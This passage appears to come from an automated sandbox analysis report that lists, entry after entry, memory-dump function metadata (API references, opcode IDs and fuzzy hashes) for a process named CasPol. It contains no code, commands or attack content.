                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 697e230acc45813cbaa3eb5176af1817bb8863874ac1c72d230307457fa6b6b4
                                                                                      • Instruction ID: e092d9490ce7205e1384421b4df092c9766ddd98eca3e1d6c87b3fd57d020c53
                                                                                      • Opcode Fuzzy Hash: 697e230acc45813cbaa3eb5176af1817bb8863874ac1c72d230307457fa6b6b4
                                                                                      • Instruction Fuzzy Hash: 96E19934A05328CFCB66DF64C89C689B7B2BF49719F1041E9D80AA3355CB365E82CF06
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 9573fdb0e9a8534a0e10ffac8873785e2b4b38eb7fd9d20239fc64793ddf8ca8
                                                                                      • Instruction ID: 43a43319565b1e85e6e369cfde6db518bc6b56e8962ee77fdf63f311d5f7ba12
                                                                                      • Opcode Fuzzy Hash: 9573fdb0e9a8534a0e10ffac8873785e2b4b38eb7fd9d20239fc64793ddf8ca8
                                                                                      • Instruction Fuzzy Hash: A0D18934A05328CFCB66DF64C89C689B7B2BF49719F1041E9D90AA3355CB365E82CF06
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 8d2fa692d1af7f829bd6f611f0e215f4ae62948a9f3fbc350bcf810e28d7e21a
                                                                                      • Instruction ID: 8fd4bf4bc91793a9dc6f48c91bfaa912f3d09323fe9dd9e4eaea2f8b8db92d2c
                                                                                      • Opcode Fuzzy Hash: 8d2fa692d1af7f829bd6f611f0e215f4ae62948a9f3fbc350bcf810e28d7e21a
                                                                                      • Instruction Fuzzy Hash: 59D18A34A05328CFCB66DF64C89C689B7B2BF49719F1041E9D90AA3355CB365E82CF06
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: b734e6c9e9f7ad4f0b8682dd1443a50cfef50908483e8d4ec9533c63e1d5d7d5
                                                                                      • Instruction ID: 0cc7c6a170d606c57820012e5b189d62925665c1f8bf3af19bc16e88c655cc4b
                                                                                      • Opcode Fuzzy Hash: b734e6c9e9f7ad4f0b8682dd1443a50cfef50908483e8d4ec9533c63e1d5d7d5
                                                                                      • Instruction Fuzzy Hash: 04D18934A05328CFCB66DF65C89C689B7B2BF49719F1041E9D80AA3355CB365E82CF06
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 66c831a47da9638d0221ff53e1ce30ac807438c7401f5d1ee488b9a9d93d7cc3
                                                                                      • Instruction ID: d4e801de9bda6efcadf5820eb5e39e642506021a7c4fc99ff11d867fd0539cc9
                                                                                      • Opcode Fuzzy Hash: 66c831a47da9638d0221ff53e1ce30ac807438c7401f5d1ee488b9a9d93d7cc3
                                                                                      • Instruction Fuzzy Hash: 0BC19C34A05328CFCB66DF65C89C689B7B2BF49719F1081E9D80A63355DB365E82CF12
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 58356bdc70808d0a879b29047781205471d77104ef729b749c3a27725aa7b2a6
                                                                                      • Instruction ID: c706b69f6d8a0cebfd84a3209d20ecf0e59a3721edfd87a947f3aafb466dd01c
                                                                                      • Opcode Fuzzy Hash: 58356bdc70808d0a879b29047781205471d77104ef729b749c3a27725aa7b2a6
                                                                                      • Instruction Fuzzy Hash: DEC18934A05328CFCB66DF64C89C689B7B2BF49719F1041E9D80AA3355DB365E82CF06
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: e8f3ddad3e99b541bd378989733581dc6312a096674b2b267f318371f167a3ab
                                                                                      • Instruction ID: 20abf5a4b1da53535d79009bcc8a406ce4805ff364669f72ad6d29309351bb14
                                                                                      • Opcode Fuzzy Hash: e8f3ddad3e99b541bd378989733581dc6312a096674b2b267f318371f167a3ab
                                                                                      • Instruction Fuzzy Hash: C9C19A74A05328CFCB66DF64C89C689B7B2BF49719F1041E9D80AA3355DB365E82CF06
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 49551ae05108d4269173994f882568de55f660c873b27fd8f1e9c3126d5602ff
                                                                                      • Instruction ID: a08459a114f78fa72f55b7dab3b4ddb1b38bbfffbcd295cc83e99bc6094cf5d4
                                                                                      • Opcode Fuzzy Hash: 49551ae05108d4269173994f882568de55f660c873b27fd8f1e9c3126d5602ff
                                                                                      • Instruction Fuzzy Hash: EEB18B74A05328CFCB66DF64C89C689B7B2BF49719F1041E9D80AA3355DB365E82CF06
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 6e29d46eabc0a54e5df72e0d02212368008f20a1ef09e11dd76b39db6a255109
                                                                                      • Instruction ID: 8c9f88d27bdce0608c767fc59701782ccfebb4f855cfb86ceb6aaa63aae5cc80
                                                                                      • Opcode Fuzzy Hash: 6e29d46eabc0a54e5df72e0d02212368008f20a1ef09e11dd76b39db6a255109
                                                                                      • Instruction Fuzzy Hash: B2B19974A05328CFCB66DF64C89C689B7B2BF49719F1081E9D80AA3355DB365D82CF02
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: db6758e2089944098e4a2065a4b62f7d57cd7b9da28699bb67dac8113ae989d1
                                                                                      • Instruction ID: f478e20245fc92858046e2cc2e2676ad9f413be9649dc3c9a33184c6796caf39
                                                                                      • Opcode Fuzzy Hash: db6758e2089944098e4a2065a4b62f7d57cd7b9da28699bb67dac8113ae989d1
                                                                                      • Instruction Fuzzy Hash: 5FB18974A05328CFCB66DF64C89C689B7B2BF49719F1041E9D80AA3355DB365D82CF06
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: a59d36bada06014ab41a0739e5e638f66dc6eced61c2478d78cdab845c49d203
                                                                                      • Instruction ID: 4944fe86b6f36645ba0f4efc0dee0315c9092c8b718175b571a751b2916bcc6e
                                                                                      • Opcode Fuzzy Hash: a59d36bada06014ab41a0739e5e638f66dc6eced61c2478d78cdab845c49d203
                                                                                      • Instruction Fuzzy Hash: 87A18934A05328CFCB66DF64C89C689B7B2BF49719F1041E9D80A93355DB365D82CF02
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 7408fdcde287689a332ae2602e10ed699f9a07eee25e251a45df936e68786ea7
                                                                                      • Instruction ID: f92a5cc0ff816543ba0fe95e552eab0070fe1adc7d17a2d85f7be29eec330eb7
                                                                                      • Opcode Fuzzy Hash: 7408fdcde287689a332ae2602e10ed699f9a07eee25e251a45df936e68786ea7
                                                                                      • Instruction Fuzzy Hash: 86A19934A05328CFCB66DF64C89C699B7B2BF49719F1081E9D80A93355DB365D82CF06
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 47be37d3121b4c4315b4827ddc197fec76330bbf01f8fda9229c9094195ae8fb
                                                                                      • Instruction ID: 1f818af15596d8c8a744624a10aed4e59514614706521a73603123f3292c79fc
                                                                                      • Opcode Fuzzy Hash: 47be37d3121b4c4315b4827ddc197fec76330bbf01f8fda9229c9094195ae8fb
                                                                                      • Instruction Fuzzy Hash: A0A19934A05328CFCB66DF65C89C699B7B2BF49719F1081E9D80AA3355DB365D82CF02
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 116b41f05ed086be285bca66aa6b50b6d662c22c29f1c3f4989cf25a10ef8f1a
                                                                                      • Instruction ID: 579521ea9ead82c9529e9c1046b1d7034d76c5a342d9896ca3d25a0dfd7b893d
                                                                                      • Opcode Fuzzy Hash: 116b41f05ed086be285bca66aa6b50b6d662c22c29f1c3f4989cf25a10ef8f1a
                                                                                      • Instruction Fuzzy Hash: 41919934A05328CFCB66DF64C89C699B7B2BF49719F1081E9D80AA3355DB365D82CF06
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 0b611a7b5bc9a80384aac456ed5a132428dde428f421998b47aad2f111c7770e
                                                                                      • Instruction ID: 20161eb6b8c0bfe7966774472b7cbf445b54176470e72392fd3b545f82075a4b
                                                                                      • Opcode Fuzzy Hash: 0b611a7b5bc9a80384aac456ed5a132428dde428f421998b47aad2f111c7770e
                                                                                      • Instruction Fuzzy Hash: FE919A34A05328CFCB66DF65C89C699B7B2BF49719F1081E9D80AA3355DB365D82CF02
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 433b4cba6a01ea52a6a95b79197017b4b23b4c0db23cad4d8d2a95be33d5cc37
                                                                                      • Instruction ID: c8a5f015f43ccefdf04717c5ed1251f03569504ca4b110b6e8ef102ad2898b55
                                                                                      • Opcode Fuzzy Hash: 433b4cba6a01ea52a6a95b79197017b4b23b4c0db23cad4d8d2a95be33d5cc37
                                                                                      • Instruction Fuzzy Hash: FA818B34A05328CFCB66DF65C89C69AB7B2BF49719F1081E9D80A93355DB365D82CF02
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 5ea59e2245ef7b87bf6321af1ed989f64fa12622d09d9a7793b822eebc6c8270
                                                                                      • Instruction ID: 7b2c51ec73ff6572c0b1b8ce1d6df4368c1fbd4fb3d71beba2478284e935921d
                                                                                      • Opcode Fuzzy Hash: 5ea59e2245ef7b87bf6321af1ed989f64fa12622d09d9a7793b822eebc6c8270
                                                                                      • Instruction Fuzzy Hash: B0818A34A05328CFCB66DF65C89C699B7B2BF49719F1081E9D80A93355DB365D82CF02
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 6224a14631b771286c283b1d4742eda243acff92d4d8153cd45e7c02bf1a7b3b
                                                                                      • Instruction ID: 5391b2876c35d850334c36ef2e9312d2fcc0ec3893e7dabed426d82c458865d1
                                                                                      • Opcode Fuzzy Hash: 6224a14631b771286c283b1d4742eda243acff92d4d8153cd45e7c02bf1a7b3b
                                                                                      • Instruction Fuzzy Hash: D1718A34A05328CFCB66DF64C89C699B7B2BF49719F1081E9D80AA3355DB365D82CF02
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 2f26ab60d83b4b9c41bf31655fdb12df951c2100fa8395a3ba9a89bbc8eaa497
                                                                                      • Instruction ID: e7ac6f21daf6b02209b316764c9146b6708072b85948ea2489426df2847d7575
                                                                                      • Opcode Fuzzy Hash: 2f26ab60d83b4b9c41bf31655fdb12df951c2100fa8395a3ba9a89bbc8eaa497
                                                                                      • Instruction Fuzzy Hash: 6F718934A05328CFCB66DF64C89C699B7B2BF49719F1081E9D80A93355DB365E82CF02
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 2c67f6a455973a4ac7304226c1ff35ea0853bc79c98e48dc992f894cb13bef5a
                                                                                      • Instruction ID: af6bb7cba0653093a300abcd77790fe1b00e240efb99bab1ee9e4b8bd5386747
                                                                                      • Opcode Fuzzy Hash: 2c67f6a455973a4ac7304226c1ff35ea0853bc79c98e48dc992f894cb13bef5a
                                                                                      • Instruction Fuzzy Hash: C5618934A05328CFCB66DF64C89C699B7B2BF49719F1081E9D80A93355DB365E82CF02
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: fe394c955534b2dcf6e5dd74366d1c09c260603566ed82c9a496d61ef3536247
                                                                                      • Instruction ID: 34cedcb856ea744eabed0a883f83a55a4f7f348e178b116d78054ebf4aaa58a0
                                                                                      • Opcode Fuzzy Hash: fe394c955534b2dcf6e5dd74366d1c09c260603566ed82c9a496d61ef3536247
                                                                                      • Instruction Fuzzy Hash: DA618934A05328CFCB66DF64C89C699B7B2BF49719F1081E9D80A93355DB325E82CF02
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 4f19e892263510b8d46708a922c0b2e7882f803641d8e3f76e6fa9fdab27f79e
                                                                                      • Instruction ID: 9ab9ab3ce1af919d4abc282ead031e47b719477cd8190348f575a7816e3b1630
                                                                                      • Opcode Fuzzy Hash: 4f19e892263510b8d46708a922c0b2e7882f803641d8e3f76e6fa9fdab27f79e
                                                                                      • Instruction Fuzzy Hash: F9518934A05328CFCB66DF64C89C699B7B2BF49719F1081E9D80A93355DB365E82CF02
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: c4123ad6e243bcf81e9d73f788930410fc3e3b768914cae24f9aebbba176c4bd
                                                                                      • Instruction ID: a8717f7733de6a34b55613ba6f7db897feb8e396bff9368d30b58c154f220cc0
                                                                                      • Opcode Fuzzy Hash: c4123ad6e243bcf81e9d73f788930410fc3e3b768914cae24f9aebbba176c4bd
                                                                                      • Instruction Fuzzy Hash: 6E517A34A05328CFCB66DF65C89C699B7B2BF49719F1081E9D80A93355DB365E82CF02
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 7c187f13b74fd082c284f3560e2c5991eb89bfe2af665f24bb2f1ab92ab26f5a
                                                                                      • Instruction ID: 0e8901bc9dbec1e02aecf8eb6ee29f3be298613f3e33acbaa550d5580e52a432
                                                                                      • Opcode Fuzzy Hash: 7c187f13b74fd082c284f3560e2c5991eb89bfe2af665f24bb2f1ab92ab26f5a
                                                                                      • Instruction Fuzzy Hash: 45518C34A05328CFCB66DF65C89C689B7B2BF49719F1081E9D90A93355DB365E82CF02
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 6449b4ef987a13bab754e45f2ff6cf2e28a666f422b4650e344915506765e4da
                                                                                      • Instruction ID: cf1ad55cd090b433b29600eb571a2a73185f8d99731f8eb991986e934105bc50
                                                                                      • Opcode Fuzzy Hash: 6449b4ef987a13bab754e45f2ff6cf2e28a666f422b4650e344915506765e4da
                                                                                      • Instruction Fuzzy Hash: 5A519E34A01328CFCB65DF64D89C689B7B2BF49719F1081E9D80AA3355DB365E82CF42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 9e06595505461b3e73a94901e1acd82627da712bc0813035f357fe3fc6a79bcf
                                                                                      • Instruction ID: 43aa75c885a8912b1b644118bd497c0bbb54405da6c997cf1da5ce3d505ab867
                                                                                      • Opcode Fuzzy Hash: 9e06595505461b3e73a94901e1acd82627da712bc0813035f357fe3fc6a79bcf
                                                                                      • Instruction Fuzzy Hash: 41417A34A01328CFCB65DF64D898699B7B2BF49719F1081E9D80A93355DF365E82CF02
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46714585792.0000000001120000.00000040.00000400.00020000.00000000.sdmp, Offset: 01120000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1120000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: TerminateThread
                                                                                      • String ID:
                                                                                      • API String ID: 1852365436-0
                                                                                      • Opcode ID: 03e5b01d6b5a19f02c3fa9adc2cc8807d61be2723d7c0c1945b71872933fc08c
                                                                                      • Instruction ID: fb48a82d79a3fb29820ac530a3afba3c6913b30fe2565686b21d9e6dd2d85c29
                                                                                      • Opcode Fuzzy Hash: 03e5b01d6b5a19f02c3fa9adc2cc8807d61be2723d7c0c1945b71872933fc08c
                                                                                      • Instruction Fuzzy Hash: 8F312B706043128FEB2DEE68C9A47A23792AF95324F5A817ACD49CB1AED370C4C5D642
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D6BEDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737625878.000000001D6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D6B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
